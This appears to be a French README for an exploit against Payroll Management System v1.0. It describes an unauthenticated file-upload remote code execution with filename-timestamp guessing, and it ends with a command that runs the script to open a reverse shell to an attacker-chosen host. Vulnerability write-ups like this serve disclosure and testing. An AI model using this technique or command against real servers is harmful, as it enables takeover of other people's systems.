
Exploit d'exécution de code à distance non authentifié pour Payroll Management System v1.0 via un téléchargement de fichier malveillant, avec prédiction de nom de fichier et capacité de shell inverse.

RCE via téléchargement de fichier pour https://www.sourcecodester.com/php/14475/payroll-management-system-using-phpmysql-source-code.html. Les noms de fichiers sont précédés d'un horodatage avec une précision à la minute. Le script tente de deviner le nom du fichier en utilisant l'horodatage de la minute courante, précédente et suivante.
Payroll Management System v1.0 permet aux utilisateurs de télécharger des images via la page "save_settings". Un attaquant non authentifié peut exploiter cette fonctionnalité pour télécharger à la place un fichier PHP malveillant. Les fichiers téléchargés sont stockés dans un dossier accessible publiquement et un horodatage avec une précision à la minute est ajouté à leurs noms de fichiers, lequel peut être facilement calculé. L'exploitation réussie de cette vulnérabilité permet d'exécuter du code arbitraire en tant qu'utilisateur exécutant le serveur web.
python3 exploit.py -rhost somewebsite.com -rport 443 -lhost 192.168.22.23 -lport 443 -https
